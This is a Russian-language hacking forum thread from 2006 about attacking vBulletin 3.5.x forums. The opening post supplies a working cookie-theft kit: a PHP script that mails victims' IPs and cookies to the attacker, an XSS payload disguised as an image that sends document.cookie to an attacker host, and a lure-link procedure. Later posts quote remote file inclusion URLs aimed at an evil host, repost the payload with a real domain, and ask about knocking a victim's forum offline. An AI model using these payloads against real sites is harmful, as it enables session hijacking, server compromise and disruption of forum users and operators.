Форумы Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )

Discussion in 'Уязвимости CMS/форумов' started by liauliau, 20 Apr 2006.

  1. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    работает отлично! ;)

    Code:
    ( 1 ) 
    
    -------------------------------------------------------------------- 
    
    Name file:  exploit.php 
    
    -------------------------------------------------------------------- 
    
    
    <?php 
    $ip_adresse = $_SERVER['REMOTE_ADDR']; 
    if(!empty($ip_adresse)) 
    { 
    echo 'il tuo ip и: ',$ip_adresse; 
    } 
    else 
    { 
    echo 'Impossible d\'afficher l\'IP'; 
    } 
    ?> 
    
    <a href="log.php"></a><? 
    $xx1=$HTTP_SERVER_VARS['SERVER_PORT']; 
    $day = date("d",time()); $month = date("m",time()); $year = date("Y",time()); 
    if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR; 
    else $visitor_info = $REMOTE_HOST; 
    $base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF; 
    $x1=`host $REMOTE_ADDR|grep Name`; 
    $x2=$REMOTE_PORT; 
    ?> 
    
    <?php 
    $cookie = $_GET['c']; 
    ?> 
    
    <?php 
    $myemail = "YOUR ADDRESS E-MAIL"; 
    $today = date("l, F j, Y, g:i a") ; 
    $subject = "Xss Vbulletin" ; 
    $message = "Xss: Hacking 
    Ip: $ip_adresse 
    Cookie: $cookie 
    Url: $base 
    porta usata: $xx1 
    remote port: $x2 
    Giorno & Ora : $today  \n 
    "; 
    $from = "From: $myemail\r\n"; 
    mail($myemail, $subject, $message, $from); 
    ?> 
    
    
    
    -------------------------------------------------------------------- 
    
    <?php 
    $myemail = "YOUR ADDRESS E-MAIL"; 
    
    -------------------------------------------------------------------- 
    
    
    ( 2 ) 
    
    -------------------------------------------------------------------- 
    
    Name file:  image.gif 
    
    -------------------------------------------------------------------- 
    
    
    <pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' > 
    
    
    -------------------------------------------------------------------- 
    
    location="http://YOUR ADDRESS WEB.com 
    
    -------------------------------------------------------------------- 
    
    
    ( 3 ) 
    
    -------------------------------------------------------------------- 
    
    Like Using 
    -------------------------------------------------------------------- 
    
    1°  new thread 
    2°  <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> ' 
    3°  Submit 
    4°  It waits for 
    
    -------------------------------------------------------------------- 
     
    2 people like this.
  2. pch

    pch Elder - Старейшина

    Joined:
    22 Oct 2005
    Messages:
    34
    Likes Received:
    41
    Reputations:
    15
    Видимо, работает только при разрешённых html тэгах.
    ИМХО - лажа
     
  3. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    что-то мне подсказывает, что это не то, о чём гласит топик...
    кто опровергнет мои сомнения?
     
  4. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1

    video нужнa ?
     
  5. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    liauliau - давай сними им видео а то до них это всё плохо доходит...
     
  6. Lord Nikon

    Lord Nikon Banned

    Joined:
    12 Sep 2005
    Messages:
    224
    Likes Received:
    15
    Reputations:
    -3
    слушай реально сними видео.=)
     
  7. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    ok ;) 1min
     
  8. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    чо тут непонятного, работает на xss в картинках ,осел картинки обработает как JS. Код его сплойта, работает как сниффер+отправляет все по мылу, учите господа php+JS

    сплойт гавно
     
  9. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1
    короткое video тут
     
    1 person likes this.
  10. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Всё бы здорово если бы не html on.
    Вот полез на http://packetstorm.linuxsecurity.com/ и нашёл вот это
    Code:
    Remote File Inclusion in VBulletin ImpEx 
    Date : 
    12 / 4 / 2006 
    Software :  
    VBulletin ImpEx 
    version : 
    
    VBulletin 3.5.1
    VBulletin 3.5.2
    VBulletin 3.5.4
    
    The bug reside in  : 
    
    ImpExModule.php
    ImpExController.php
    ImpExDisplay.php
    
    Exploit : 
    
    (1)
    www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
    (2)
    www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
    (3)
    www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id
    Discovery by :
    Dr.Jr7
    GreeTz : 
    special greet to Qptan & Mr.SNAKE  & trooq
    and to my all frinds in www.lezr.com/vb
    see u :} 
     
    1 person likes this.
  11. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    Impex это модуль вроде бы?
     
  12. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Похоже что да, ибо довольно часто натыкаюсь на 404.
     
  13. micle

    micle New Member

    Joined:
    4 Feb 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -1
    а ниукого хотябы досера нету?
    чтобы прокси обращались к поиску, а главное был бы sql запрос
    и тогда у жертвы (в моем случае)повиснит форум т.к ограничено 20.000 запросами к БД
     
  14. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    935
    Likes Received:
    396
    Reputations:
    261
    Видео посмотрел там Xss просто.
     
  15. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    А можно,это просто в новое сообщение в форуме вставить?
    Там ХТМЛ разрешен
     
  16. CaH9

    CaH9 Elder - Старейшина

    Joined:
    16 Apr 2006
    Messages:
    34
    Likes Received:
    10
    Reputations:
    0
    Уязвимости vBulletin v3.5.4

    подскажите есть что нибудь под эту версию ??
    p.s : тема ниже не работает
     
  17. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    Я должен на форуме в сообщении написать это <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >
    И залить сплоит к себе ,так???
     
  18. liauliau

    liauliau Member

    Joined:
    9 Apr 2005
    Messages:
    30
    Likes Received:
    6
    Reputations:
    -1

    Видео смотрел ???
     
  19. CaH9

    CaH9 Elder - Старейшина

    Joined:
    16 Apr 2006
    Messages:
    34
    Likes Received:
    10
    Reputations:
    0
  20. nix

    nix Banned

    Joined:
    7 May 2006
    Messages:
    33
    Likes Received:
    3
    Reputations:
    -5
    Говно! хтмл практически у всех отключен! А Ipmex сплоит тож гавно, импех тока когда с движка форума каковонить пережаешь на воблу, потом этот скрипт все удаляют!